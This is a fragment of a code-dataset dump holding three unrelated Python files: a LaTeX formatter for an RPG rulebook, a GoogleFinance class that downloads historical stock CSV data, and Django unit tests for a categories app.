no_op\n\n\n def start_subsection(self, subsection):\n title_element = subsection.find(\"subsectiontitle\")\n if title_element is None:\n title = \"\"\n else:\n title = title_element.text\n\n self.latex_file.write(\"\\\\subsection{%s}\\n\" % title) \n return\n\n def end_subsection(self, subsection): \n return\n\n start_subsection_title = no_op\n end_subsection_title = no_op\n\n start_subsubsection_title = no_op\n end_subsubsection_title = no_op\n\n def start_playexample(self, playexample):\n self.latex_file.write(\"\\\\begin{playexample}\\n\")\n return\n\n def end_playexample(self, playexample):\n self.latex_file.write(playexample.text) \n self.latex_file.write(\"\\\\end{playexample}\\n\") \n return\n\n\n ## def start_skill(self, skill):\n ## title_element = skill.find(\"skilltitle\")\n ## if title_element is None:\n ## title = \"\"\n ## else:\n ## title = title_element.text\n\n ## self.latex_file.write(\"\\\\subsection*{%s}\\n\" % title)\n ## return\n\n ## def end_skill(self, skill): \n ## return\n\n ## def start_skill_title(self, skill_title):\n ## return\n\n ## def end_skill_title(self, skill_title):\n ## return\n\n\n\n def start_level_progression_table(self, element):\n self._current_row_in_level_table = 0\n self.latex_file.write(\n \"\\\\begin{tabularx}{0.9\\\\linewidth}{\"\n \"p{\\\\widthof{10000}}p{\\\\widthof{30}}X\"\n \"} \\\\\\\\ \\n\"\n \"\\\\bottomrule \\n\"\n \"\\\\rpgtableheader{Level} & \"\n \"\\\\rpgtableheader{XP} & \"\n \"\\\\rpgtableheader{Description} \\\\\\\\ \\n\")\n return\n \n def end_level_progression_table(self, element):\n self.latex_file.write(\"\\\\bottomrule \\n\"\n \"\\\\end{tabularx}\\n\"\n \"\\n\")\n return\n \n def start_level(self, level):\n self._current_row_in_level_table += 1\n #self,la\n if self._current_row_in_level_table % 2 == 1: \n self.latex_file.write(\"\\\\rowcolor{blue!20} \\n\")\n else:\n self.latex_file.write(\"\\\\rowcolor{white!20} \\n\")\n return\n \n def end_level(self, level):\n self.latex_file.write(\" \\\\\\\\\\n\")\n return \n \n def start_level_xp(self, element):\n self.latex_file.write(\" %s &\" % element.text)\n return \n end_level_xp = no_op\n \n def start_level_number(self, element):\n self.latex_file.write(\" %s &\" % element.text)\n return \n end_level_number = no_op\n\n def start_level_combat(self, element):\n self.latex_file.write(\"\\\\rpgcombatsymbol %s \" % element.text)\n return \n end_level_combat = no_op\n\n def start_level_training(self, element):\n self.latex_file.write(\"\\\\rpgtrainingsymbol %s \" % element.text)\n return \n end_level_training = no_op\n\n def start_level_learning(self, element):\n self.latex_file.write(\"\\\\rpglearningsymbol %s \" % element.text)\n return \n end_level_learning = no_op\n \n def start_level_description(self, element):\n self.latex_file.write(\" %s \" % element.text)\n return\n\n def end_level_description(self, element):\n pass\n\n\n def start_title_page(self, chapter):\n self.latex_file.write(\"\\\\begin{titlepage}\\n\"\n \"\\\\begin{center}\\n\")\n return\n\n def end_title_page(self, chapter):\n self.latex_file.write(\"\\\\end{center}\\n\"\n \"\\\\end{titlepage}\\n\")\n return\n\n\n def start_emph(self, emph):\n return\n\n def end_emph(self, emph):\n self.latex_file.write(\"\\\\emph{%s}\" % strip_ws(emph.text))\n #self.latex_file.write(\"\\\\emph{%s}%s\" % (strip_ws(emph.text), emph.tail))\n return\n\n\n def handle_text(self, text):\n if text is not None:\n self.latex_file.write(text.encode('utf8'))\n return\n\n\n start_index_entry = no_op\n def end_index_entry(self, index_entry):\n 
self.latex_file.write(\"\\\\index{%s}\" % strip_ws(index_entry.text))\n #self.latex_file.write(\"\\\\emph{%s}\" % strip_ws(defn.tail))\n ## self.latex_file.write(strip_ws(defn.text))\n ## self.latex_file.write(\"} \")\n ## #self.latex_file.write(\"\\\\emph{%s}\" % strip_ws(defn.text))\n ## self.latex_file.write(strip_ws(defn.tail))\n return\n\n def start_defn(self, defn):\n #self.latex_file.write(\"\\\\emph{\")\n return\n\n def end_defn(self, defn):\n self.latex_file.write(\"\\\\emph{%s}\\\\index{%s}\" % (strip_ws(defn.text),\n strip_ws(defn.text)))\n ## self.latex_file.write(\"\\\\emph{%s}\\\\index{%s}%s\" % (strip_ws(defn.text),\n ## strip_ws(defn.text),\n ## defn.tail))\n #self.latex_file.write(\"\\\\emph{%s}\" % strip_ws(defn.tail))\n ## self.latex_file.write(strip_ws(defn.text))\n ## self.latex_file.write(\"} \")\n ## #self.latex_file.write(\"\\\\emph{%s}\" % strip_ws(defn.text))\n ## self.latex_file.write(strip_ws(defn.tail))\n return\n\n def start_chapter(self, chapter):\n title_element = chapter.find(\"chaptertitle\")\n if title_element is None:\n title = \"\"\n else:\n title = title_element.text\n self.latex_file.write(\"\\\\chapter{%s}\\n\" % title)\n return\n\n def end_chapter(self, chapter):\n # remember to drop cap the first letter of the word in this chapter\n self._drop_capped_first_letter_of_chapter = False\n return\n\n def start_paragraph(self, paragraph):\n self.latex_file.write(\"\\n\\n\")\n\n # add drop caps to the first word of every chapter\n if not self._drop_capped_first_letter_of_chapter:\n self._drop_capped_first_letter_of_chapter = True\n words = paragraph.text.split()\n if len(words) > 0:\n first_word = words[0]\n if len(first_word) > 0:\n first_letter = first_word[0]\n other_letters = first_word[1:]\n\n drop_cap_word = (\"\\\\lettrine[\"\n \"lines=2, \"\n \"lraise=0.1, \"\n # horizontal displacement of the indented text\n \"findent=-0.14em, \" \n \"nindent=0.3em, \"\n \"slope=0em]{\\\\rpgdropcapfont %s}{%s}\" %\n (first_letter, other_letters))\n\n words = [drop_cap_word, ] + words[1:]\n\n text = \" \".join(words)\n else:\n text = paragraph.text\n\n self.latex_file.write(text) \n return\n\n def end_paragraph(self, paragraph):\n self.latex_file.write(\"\\n\\n\")\n return\n\n\n def start_design(self, design):\n if settings.print_design_notes:\n self.latex_file.write(\"\\n\\n\")\n self.latex_file.write(design.text) \n return\n\n def end_design(self, design):\n self.latex_file.write(\"\\n\\n\")\n return\n\n\n def start_provenance(self, provenance):\n self.latex_file.write(\"\\n\\n\") \n #self.latex_file.write(\"\\\\begin{quote}\")\n\n if settings.print_provenence_notes:\n self.latex_file.write(\"\\\\begin{center}\")\n self.latex_file.write(\"\\\\begin{minipage}[c]{0.9\\linewidth}\")\n # self.latex_file.write(\"\\\\emph{\")\n self.latex_file.write(\"\\\\rpgprovenancesymbol\\\\hspace{0.2em}\") \n self.latex_file.write(provenance.text) \n return\n\n def end_provenance(self, provenance):\n #self.latex_file.write(\"}\") \n if settings.print_provenence_notes:\n self.latex_file.write(\"\\\\end{minipage}\") \n self.latex_file.write(\"\\\\end{center}\")\n self.latex_file.write(\"\\n\\n\")\n return\n\n\n def start_author(self, author):\n self.latex_file.write(\"{\\\\Large \\\\rpgtitleauthorfont %s}\\\\\\\\\" % author.text) \n #self.latex_file.write(\"{\\\\begin{easteregg}\\\\Large \\\\rpgtitleauthorfont %s\\\\end{easteregg}}\\\\\\\\\" % author.text) \n return\n\n def end_author(self, author):\n return\n\n def start_title(self, title):\n self.latex_file.write(\"{ 
\\\\color{rpgtitlefontcolor} \\\\rpgtitlefont %s }\\\\\\\\\\n\"\n % title.text)\n return\n\n def end_title(self, title):\n return\n\n def start_subtitle(self, subtitle): \n self.latex_file.write(\"{\\\\large \\\\rpgtitlesubtitlefont %s}\\\\\\\\\\n\" % subtitle.text)\n return\n\n def end_subtitle(self, title):\n return\n \n def start_chapter_title(self, chapter_title):\n return\n\n def end_chapter_title(self, chapter_title):\n return\n\n\n def start_section_title(self, section_title):\n return\n\n def end_section_title(self, section_title):\n return\n\n def start_img(self, img):\n\n if settings.debug_outline_images:\n self.latex_file.write(\"\\\\fbox{\")\n\n \n self.latex_file.write(\"\\\\includegraphics[scale=%s]{%s}\"\n % (img.get(\"scale\", default=\"1.0\"), img.get(\"src\")))\n \n if settings.debug_outline_images:\n self.latex_file.write(\"}\")\n\n self.latex_file.write(\"\\\\\\\\\\n\")\n return\n\n def end_img(self, img):\n return\n\n def start_figure(self, figure):\n #self.latex_file.write(\"\\\\begin{wrapfigure}{h}{0.5\\\\linewidth}\\n\")\n self.latex_file.write(\"\\\\begin{figure}\\n\")\n self.latex_file.write(\"\\\\centering\\n\")\n #self.latex_file.write(\"%s\\n\" % figure.text)\n self.latex_file.write(\"\\\\includegraphics[scale=0.36]{%s}\\n\"\n % (figure.get(\"src\")))\n\n caption = figure.get(\"caption\")\n if caption is not None:\n self.latex_file.write(\"\\\\caption{%s}\\n\" % caption)\n return\n\n def end_figure(self, figure):\n #self.latex_file.write(\"\\\\end{wrapfigure}\\n\")\n self.latex_file.write(\"\\\\end{figure}\\n\")\n return\n\n def start_enumeration(self, enumeration):\n # the [i] gets us roman numerals in the enumeration\n self.latex_file.write(\"\\\\begin{enumerate}[i.]\\n\")\n return\n\n def end_enumeration(self, enumeration):\n self.latex_file.write(\"\\\\end{enumerate}\\n\")\n return\n\n def start_descriptions(self, description_list):\n self.latex_file.write(\"\\\\begin{description}\\n\")\n return\n\n def end_descriptions(self, description_list):\n self.latex_file.write(\"\\\\end{description}\\n\")\n return\n\n def start_description(self, description):\n self.latex_file.write(\"%s\" % description.text)\n return\n\n def end_description(self, list_item):\n return\n\n def start_description_term(self, term):\n self.latex_file.write(\"\\\\item[%s]\" % term.text)\n return\n\n def end_description_term(self, list_item):\n return\n\n\n def start_list(self, list_element):\n self.latex_file.write(\"\\\\begin{itemize}\\n\")\n return\n\n def end_list(self, list_element):\n self.latex_file.write(\"\\\\end{itemize}\\n\")\n return\n\n def start_list_item(self, list_item):\n self.latex_file.write(\"\\\\item \")\n self.latex_file.write(list_item.text)\n return\n\n def end_list_item(self, list_item):\n return\n\n def start_comment(self, comment):\n return\n\n def end_comment(self, comment):\n return\n\n\n\n def start_table(self, table):\n\n # we need to work out in advance the table layout (e.g. 
|c|c|c| or whatever).\n header = table.find(\"tableheader\")\n table_spec = \"\"\n self._number_of_columns_in_table = 0\n self._current_column_in_table = 0\n self._current_row_in_table = 0\n\n for child in header.iterchildren():\n assert child.tag == \"td\" \n self._number_of_columns_in_table += 1\n width = child.get(\"width\")\n if width == \"fit\":\n table_spec += \"p{\\\\widthof{%s}}\" % child.text\n else:\n table_spec += \"X\"\n\n self.latex_file.write(\"\\\\begin{table}\\n\")\n self.latex_file.write(\"\\\\begin{tabularx}{0.9\\\\linewidth}{%s} \\\\toprule\\n\" % table_spec)\n return\n\n def end_table(self, table):\n self.latex_file.write(\"\\\\bottomrule \\n\"\n \"\\\\end{tabularx}\\n\"\n \"\\n\")\n\n table_title = table.find(\"tabletitle\")\n self.latex_file.write(\"\\\\caption{%s}\\n\" % table_title.text) \n self.latex_file.write(\"\\\\end{table}\\n\") \n return\n\n ## def start_table_title(self, table_of_contents):\n ## self.latex_file.write(\"\\\\begin{rpgtable}\\n\")\n ## return\n\n start_table_title = no_op\n end_table_title = no_op\n ## def end_table_title(self, table_title):\n ## #self.latex_file.write(\"\\\\caption{%s}\\n\" % table_title.text)\n ## return\n\n def start_table_header(self, table_header):\n self.latex_file.write(\"\\\\rowcolor{blue!33} \\n\")\n return\n\n def end_table_header(self, table_header):\n self.latex_file.write(\" \\\\\\\\\\n\")\n #self.latex_file.write(\"\\\\caption{%s}\\n\" % table_title.text)\n return\n\n\n def start_table_row(self, table_of_contents):\n self._current_row_in_table += 1\n\n if (self._current_row_in_table + 1) % 2 == 1: \n self.latex_file.write(\"\\\\rowcolor{blue!20} \\n\")\n else:\n #self.latex_file.write(\"\\\\rowcolor{yellow!50} \\n\")\n pass\n return\n\n def end_table_row(self, table_title):\n self.latex_file.write(\" \\\\\\\\\\n\")\n #self.latex_file.write(\"\\\\caption{%s}\\n\" % table_title.text)\n return\n\n def start_table_data(self, table_data):\n\n self._current_column_in_table = (\n (self._current_column_in_table + 1) % self._number_of_columns_in_table)\n\n if self._current_row_in_table == 0:\n self.latex_file.write(\"\\\\rpgtableheader{%s} \\n\" %\n table_data.text)\n else:\n self.latex_file.write(\"%s\" % table_data.text)\n\n if self._current_column_in_table != 0:\n self.latex_file.write(\" & \\n\")\n \n return\n\n end_table_data = no_op\n ## def (self, table_title):\n ## #self.latex_file.write(\"\\\\caption{%s}\\n\" % table_title.text)\n ## return\n\n\n def start_table_of_contents(self, table_of_contents):\n self.latex_file.write(\"\\\\tableofcontents\\n\")\n return\n\n def end_table_of_contents(self, table_of_contents):\n return\n\n def start_list_of_figures(self, list_of_figures):\n self.latex_file.write(\"\\\\listoffigures\\n\")\n return\n\n def end_list_of_figures(self, list_of_figures):\n return\n\n def start_list_of_tables(self, list_of_tables):\n self.latex_file.write(\"\\\\listoftables\\n\")\n return\n\n def end_list_of_tables(self, list_of_tables):\n return\n\n def start_combat_symbol(self, combat_symbol):\n #self.latex_file.write(\"\\\\rpgcombatsymbol\\\\ %s\" % combat_symbol.tail)\n self.latex_file.write(\"\\\\rpgcombatsymbol\\\\ \")\n return\n end_combat_symbol = no_op\n\n def start_training_symbol(self, training_symbol):\n #self.latex_file.write(\"\\\\rpgtrainingsymbol\\\\ %s\" % training_symbol.tail)\n self.latex_file.write(\"\\\\rpgtrainingsymbol\\\\ \")\n return\n end_training_symbol = no_op\n\n def start_learning_symbol(self, learning_symbol):\n #self.latex_file.write(\"\\\\rpglearningsymbol\\\\ %s\" % 
learning_symbol.tail)\n self.latex_file.write(\"\\\\rpglearningsymbol\\\\ \")\n return\n end_learning_symbol = no_op\n\n\n\n def start_success(self, success):\n #self.latex_file.write(\"\\\\rpgsuccess\\\\ %s\" % success.tail)\n self.latex_file.write(\"\\\\rpgsuccess\\\\ \")\n return\n end_success = no_op\n\n def start_fail(self, fail):\n #self.latex_file.write(\"\\\\rpgfail\\\\ %s\" % fail.tail)\n self.latex_file.write(\"\\\\rpgfail\\\\ \")\n return\n end_fail = no_op\n\n\n def start_unknown(self, unknown):\n raise Exception(\"UNKNOWN (%s) %s\\n\" % (unknown.tag, str(unknown)))\n return\n\n def end_unknown(self, unknown):\n raise Exception(\"UNKNOWN (%s) %s\\n\" % (unknown.tag, str(unknown)))\n return\n\n def start_vspace(self, vspace):\n self.latex_file.write(\"\\\\vspace{%s\\drop}\\n\" % int(vspace.text))\n return\n\n def end_vspace(self, vspace):\n return\n", "sub_path": "src/latex_formatter.py", "file_name": "latex_formatter.py", "file_ext": "py", "file_size_in_byte": 31771, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "zope.interface.verify.verifyObject", "line_number": 61, "usage_type": "call"}, {"api_name": "i_formatter.IFormatter", "line_number": 61, "usage_type": "argument"}, {"api_name": "settings.paper_size", "line_number": 72, "usage_type": "attribute"}, {"api_name": "settings.paper_size", "line_number": 74, "usage_type": "attribute"}, {"api_name": "settings.display_page_background", "line_number": 321, "usage_type": "attribute"}, {"api_name": "settings.print_design_notes", "line_number": 636, "usage_type": "attribute"}, {"api_name": "settings.print_provenence_notes", "line_number": 650, "usage_type": "attribute"}, {"api_name": "settings.print_provenence_notes", "line_number": 660, "usage_type": "attribute"}, {"api_name": "settings.debug_outline_images", "line_number": 705, "usage_type": "attribute"}, {"api_name": "settings.debug_outline_images", "line_number": 712, "usage_type": "attribute"}]} +{"seq_id": "412445997", "text": "__author__ = 'Julien Heck'\n\n\"\"\"\nGoogleFinance.py\nGoogleFinance class\n\"\"\"\n\nimport urllib.request\nimport datetime\nimport logging\n\nclass GoogleFinance:\n \"\"\"\n Connect to google finance url and download stock data\n \"\"\"\n\n def __init__(self, symbol=None, start_date=None):\n \"\"\"\n Class constructor\n :param symbol: string of stock symbol\n :param start_date: struct_time object, start date of the stock data\n :return:\n \"\"\"\n self.symbol = symbol.upper()\n self.start_date = start_date\n # Create URL based on parameters symbol and start_date\n self.base_url = \"http://www.google.com/finance/historical?q=\"\n logging.info(\"GoogleFinance instance created for {0} stocks starting from {1}-{2}-{3}\"\n .format(self.symbol, self.start_date.tm_year, self.start_date.tm_mon, self.start_date.tm_mday))\n\n def get_historical_data(self, filename=None):\n \"\"\"\n :param filename: string of file name of output data\n :return: write data retrieved from base_url to filename\n \"\"\"\n today_date = datetime.datetime.today().date()\n success = True\n # Create URL string based on symbol, start date and today's date\n try:\n start_date_str = \"{0}-{1}-{2}\".format(self.start_date.tm_year, self.start_date.tm_mon, self.start_date.tm_mday)\n url_str = (self.base_url + self.symbol + \"&startdate=\"\n + start_date_str\n + \"&enddate={}\".format(today_date) + \"&output=csv\")\n logging.info(\"Accessing url: {0}\".format(url_str))\n # Connect to URL and download data\n url_data = 
urllib.request.urlopen(url_str)\n csv = (url_data.read()).decode(\"utf-8-sig\").encode(\"utf-8\")\n except Exception:\n message = \"Failed to connect to URL\"\n print(message)\n logging.error(message)\n success = False\n # Write output to file if file name is not null and the download succeeded\n if filename is not None and success:\n try:\n parse_file = open(filename, \"w\")\n str_response = csv.decode('utf-8')\n print(str_response, file=parse_file)\n parse_file.close()\n except Exception:\n message = \"Failed to open/write to file: {0}\".format(filename)\n print(message)\n logging.error(message)\n success = False\n return success", "sub_path": "Python Programming I/GoogleFinance.py", "file_name": "GoogleFinance.py", "file_ext": "py", "file_size_in_byte": 2451, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "logging.info", "line_number": 28, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 36, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 36, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 44, "usage_type": "call"}, {"api_name": "urllib.request.request.urlopen", "line_number": 46, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 46, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 46, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 51, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 63, "usage_type": "call"}]}
{"seq_id": "294910166", "text": "from django.core.urlresolvers import reverse\r\nfrom django.contrib.auth.models import User\r\n\r\nfrom epic.categories.constants import NO_CATEGORY\r\nfrom epic.categories.models import Category\r\nfrom epic.categories.models import CannotDeleteNoCategoryException\r\nfrom epic.core.test import CustomTestCase\r\nfrom epic.core.util.view_utils import *\r\nfrom epic.datarequests.models import DataRequest\r\nfrom epic.datasets.models import DataSet\r\nfrom epic.projects.models import Project\r\n\r\n\r\nclass ViewCategoriesTestCase(CustomTestCase):\r\n def setUp(self):\r\n self.view_categories_url = \\\r\n reverse('epic.categories.views.view_categories')\r\n \r\n def testNoCategoriesExist(self):\r\n Category.objects.all().delete()\r\n \r\n response = self.client.get(self.view_categories_url)\r\n self.assertContains(response,\r\n 'There are currently no categories available.')\r\n \r\n def testCategoriesExist(self):\r\n category = Category.objects.create(name='Test Category',\r\n description='Test Description')\r\n \r\n response = self.client.get(self.view_categories_url)\r\n self.assertContains(response, category.name)\r\n\r\nclass ViewItemsForCategoryTestCase(CustomTestCase):\r\n \r\n fixtures = ['categories_categories']\r\n \r\n def setUp(self):\r\n self.category1 = Category.objects.get(name='Test Category1')\r\n self.datasets = DataSet.objects.filter(category=self.category1)\r\n self.projects = Project.objects.filter(category=self.category1)\r\n self.datarequests = \\\r\n DataRequest.objects.filter(category=self.category1)\r\n \r\n self.view_all_items_url = reverse(\r\n 'epic.categories.views.view_items_for_category',\r\n kwargs={'category_id': self.category1.id})\r\n \r\n self.view_datasets_url = reverse(\r\n 'epic.categories.views.view_datasets_for_category',\r\n kwargs={'category_id': self.category1.id})\r\n \r\n self.view_projects_url = reverse(\r\n 'epic.categories.views.view_projects_for_category',\r\n kwargs={'category_id': self.category1.id})\r\n \r\n 
self.view_datarequests_url = reverse(\r\n 'epic.categories.views.view_datarequests_for_category',\r\n kwargs={'category_id': self.category1.id})\r\n \r\n def testInvalidCategory(self):\r\n invalid_all_items_for_category_url = reverse(\r\n 'epic.categories.views.view_items_for_category',\r\n kwargs={'category_id': 1337})\r\n all_items_response = \\\r\n self.client.get(invalid_all_items_for_category_url)\r\n self.assertStatusCodeIsAFailure(all_items_response.status_code)\r\n \r\n invalid_datasets_for_category_url = reverse(\r\n 'epic.categories.views.view_datasets_for_category',\r\n kwargs={'category_id': 1337})\r\n datasets_response = \\\r\n self.client.get(invalid_datasets_for_category_url)\r\n self.assertStatusCodeIsAFailure(datasets_response.status_code)\r\n \r\n invalid_projects_for_category_url = reverse(\r\n 'epic.categories.views.view_projects_for_category',\r\n kwargs={'category_id': 1337})\r\n projects_response = \\\r\n self.client.get(invalid_projects_for_category_url)\r\n self.assertStatusCodeIsAFailure(projects_response.status_code)\r\n \r\n invalid_datarequests_for_category_url = reverse(\r\n 'epic.categories.views.view_datarequests_for_category',\r\n kwargs={'category_id': 1337})\r\n datarequests_response = \\\r\n self.client.get(invalid_datarequests_for_category_url)\r\n self.assertStatusCodeIsAFailure(datarequests_response.status_code)\r\n \r\n \"\"\"\r\n NOTE: these tests will fail once we implement pagination,\r\n since not all items will be displayed on the first page.\r\n \"\"\"\r\n \r\n def testAllItemsInValidCategory(self):\r\n datasets = self.datasets.all()\r\n projects = self.projects.all()\r\n datarequests = self.datarequests.all()\r\n \r\n response = self.client.get(self.view_all_items_url)\r\n \r\n for dataset in datasets:\r\n self.assertContains(response, dataset.name)\r\n \r\n for project in projects:\r\n self.assertContains(response, project.name)\r\n \r\n for datarequest in datarequests:\r\n self.assertContains(response, datarequest.name)\r\n \r\n def testDatasetsInValidCategory(self):\r\n datasets = list(self.datasets.all())\r\n \r\n response = self.client.get(self.view_datasets_url)\r\n \r\n for dataset in datasets:\r\n self.assertContains(response, dataset.name)\r\n\r\n def testDataRequestsInValidCategory(self):\r\n datarequests = list(self.datarequests.all())\r\n \r\n response = self.client.get(self.view_datarequests_url)\r\n \r\n for datarequest in datarequests:\r\n self.assertContains(response, datarequest.name)\r\n\r\n def testProjectsInValidCategory(self):\r\n projects = list(self.projects.all())\r\n \r\n response = self.client.get(self.view_projects_url)\r\n \r\n for project in projects:\r\n self.assertContains(response, project.name)\r\n \r\nclass CategoryTemplateTagsTestCase(CustomTestCase):\r\n fixtures = ['categories_categories']\r\n \r\n def setUp(self):\r\n self.category1 = Category.objects.get(name='Test Category1')\r\n self.category2 = Category.objects.get(name='Test Category2')\r\n self.dataset = DataSet.objects.active()[0]\r\n self.project = Project.objects.active()[0]\r\n self.datarequest = DataRequest.objects.active()[0]\r\n \r\n self.view_categories_url = \\\r\n reverse('epic.categories.views.view_categories')\r\n \r\n self.view_all_items_url = reverse(\r\n 'epic.categories.views.view_items_for_category',\r\n kwargs={'category_id': self.category1.id})\r\n \r\n self.view_dataset_url = \\\r\n get_item_url(self.dataset, 'epic.datasets.views.view_dataset')\r\n \r\n self.view_project_url = \\\r\n get_item_url(self.project, 
'epic.projects.views.view_project')\r\n \r\n self.view_datarequest_url = get_item_url(\r\n self.datarequest, 'epic.datarequests.views.view_datarequest')\r\n \r\n def testCategories(self):\r\n response = self.client.get(self.view_categories_url)\r\n self.assertStatusCodeIsASuccess(response.status_code)\r\n self.assertContains(response, self.category1.name)\r\n self.assertContains(response, self.category2.name)\r\n \r\n def testCategoryListingInItemHeaders(self):\r\n view_category_url = '' % self.view_all_items_url\r\n \r\n dataset_response = self.client.get(self.view_dataset_url)\r\n self.assertContains(dataset_response, view_category_url)\r\n \r\n project_response = self.client.get(self.view_project_url)\r\n self.assertContains(project_response, view_category_url)\r\n \r\n datarequest_response = self.client.get(self.view_datarequest_url)\r\n self.assertContains(datarequest_response, view_category_url)\r\n\r\nclass DeleteCategoryTestCase(CustomTestCase):\r\n fixtures = ['categories_categories']\r\n \r\n def setUp(self):\r\n self.bob = User.objects.get(username='bob')\r\n self.category = Category.objects.create(name='category1',\r\n description='category2')\r\n self.dataset_name = 'a38yyth'\r\n self.dataset_description = 'asd09g4h6'\r\n self.dataset = DataSet.objects.create(\r\n name=self.dataset_name,\r\n description=self.dataset_description,\r\n category=self.category,\r\n creator=self.bob)\r\n \r\n def testDeleting(self):\r\n # I've overwritten the delete method so make sure that\r\n # deleting a category won't delete the dataset attached to it.\r\n self.category.delete()\r\n \r\n try:\r\n dataset = DataSet.objects.get(\r\n name=self.dataset_name,\r\n description=self.dataset_description,\r\n creator=self.bob)\r\n except DataSet.DoesNotExist:\r\n self.fail()\r\n \r\n def testDeletingNoCategory(self):\r\n no_category = Category.objects.get(name=NO_CATEGORY)\r\n test_passed = False\r\n \r\n try:\r\n no_category.delete()\r\n except CannotDeleteNoCategoryException:\r\n test_passed = True\r\n \r\n self.failIfNot(test_passed)\r\n", "sub_path": "tags/epic/sprint3_2010-04-08/categories/tests.py", "file_name": "tests.py", "file_ext": "py", "file_size_in_byte": 8669, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "epic.core.test.CustomTestCase", "line_number": 14, "usage_type": "name"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 17, "usage_type": "call"}, {"api_name": "epic.categories.models.Category.objects.all", "line_number": 20, "usage_type": "call"}, {"api_name": "epic.categories.models.Category.objects", "line_number": 20, "usage_type": "attribute"}, {"api_name": "epic.categories.models.Category", "line_number": 20, "usage_type": "name"}, {"api_name": "epic.categories.models.Category.objects.create", "line_number": 27, "usage_type": "call"}, {"api_name": "epic.categories.models.Category.objects", "line_number": 27, "usage_type": "attribute"}, {"api_name": "epic.categories.models.Category", "line_number": 27, "usage_type": "name"}, {"api_name": "epic.core.test.CustomTestCase", "line_number": 33, "usage_type": "name"}, {"api_name": "epic.categories.models.Category.objects.get", "line_number": 38, "usage_type": "call"}, {"api_name": "epic.categories.models.Category.objects", "line_number": 38, "usage_type": "attribute"}, {"api_name": "epic.categories.models.Category", "line_number": 38, "usage_type": "name"}, {"api_name": "epic.datasets.models.DataSet.objects.filter", "line_number": 39, "usage_type": 
"call"}, {"api_name": "epic.datasets.models.DataSet.objects", "line_number": 39, "usage_type": "attribute"}, {"api_name": "epic.datasets.models.DataSet", "line_number": 39, "usage_type": "name"}, {"api_name": "epic.projects.models.Project.objects.filter", "line_number": 40, "usage_type": "call"}, {"api_name": "epic.projects.models.Project.objects", "line_number": 40, "usage_type": "attribute"}, {"api_name": "epic.projects.models.Project", "line_number": 40, "usage_type": "name"}, {"api_name": "epic.datarequests.models.DataRequest.objects.filter", "line_number": 42, "usage_type": "call"}, {"api_name": "epic.datarequests.models.DataRequest.objects", "line_number": 42, "usage_type": "attribute"}, {"api_name": "epic.datarequests.models.DataRequest", "line_number": 42, "usage_type": "name"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 44, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 48, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 52, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 56, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 61, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 68, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 75, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 82, "usage_type": "call"}, {"api_name": "epic.core.test.CustomTestCase", "line_number": 134, "usage_type": "name"}, {"api_name": "epic.categories.models.Category.objects.get", "line_number": 138, "usage_type": "call"}, {"api_name": "epic.categories.models.Category.objects", "line_number": 138, "usage_type": "attribute"}, {"api_name": "epic.categories.models.Category", "line_number": 138, "usage_type": "name"}, {"api_name": "epic.categories.models.Category.objects.get", "line_number": 139, "usage_type": "call"}, {"api_name": "epic.categories.models.Category.objects", "line_number": 139, "usage_type": "attribute"}, {"api_name": "epic.categories.models.Category", "line_number": 139, "usage_type": "name"}, {"api_name": "epic.datasets.models.DataSet.objects.active", "line_number": 140, "usage_type": "call"}, {"api_name": "epic.datasets.models.DataSet.objects", "line_number": 140, "usage_type": "attribute"}, {"api_name": "epic.datasets.models.DataSet", "line_number": 140, "usage_type": "name"}, {"api_name": "epic.projects.models.Project.objects.active", "line_number": 141, "usage_type": "call"}, {"api_name": "epic.projects.models.Project.objects", "line_number": 141, "usage_type": "attribute"}, {"api_name": "epic.projects.models.Project", "line_number": 141, "usage_type": "name"}, {"api_name": "epic.datarequests.models.DataRequest.objects.active", "line_number": 142, "usage_type": "call"}, {"api_name": "epic.datarequests.models.DataRequest.objects", "line_number": 142, "usage_type": "attribute"}, {"api_name": "epic.datarequests.models.DataRequest", "line_number": 142, "usage_type": "name"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 145, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 147, "usage_type": "call"}, {"api_name": "epic.core.test.CustomTestCase", "line_number": 178, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.get", "line_number": 182, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", 
"line_number": 182, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 182, "usage_type": "name"}, {"api_name": "epic.categories.models.Category.objects.create", "line_number": 183, "usage_type": "call"}, {"api_name": "epic.categories.models.Category.objects", "line_number": 183, "usage_type": "attribute"}, {"api_name": "epic.categories.models.Category", "line_number": 183, "usage_type": "name"}, {"api_name": "epic.datasets.models.DataSet.objects.create", "line_number": 187, "usage_type": "call"}, {"api_name": "epic.datasets.models.DataSet.objects", "line_number": 187, "usage_type": "attribute"}, {"api_name": "epic.datasets.models.DataSet", "line_number": 187, "usage_type": "name"}, {"api_name": "epic.datasets.models.DataSet.objects.get", "line_number": 199, "usage_type": "call"}, {"api_name": "epic.datasets.models.DataSet.objects", "line_number": 199, "usage_type": "attribute"}, {"api_name": "epic.datasets.models.DataSet", "line_number": 199, "usage_type": "name"}, {"api_name": "epic.datasets.models.DataSet.DoesNotExist", "line_number": 203, "usage_type": "attribute"}, {"api_name": "epic.datasets.models.DataSet", "line_number": 203, "usage_type": "name"}, 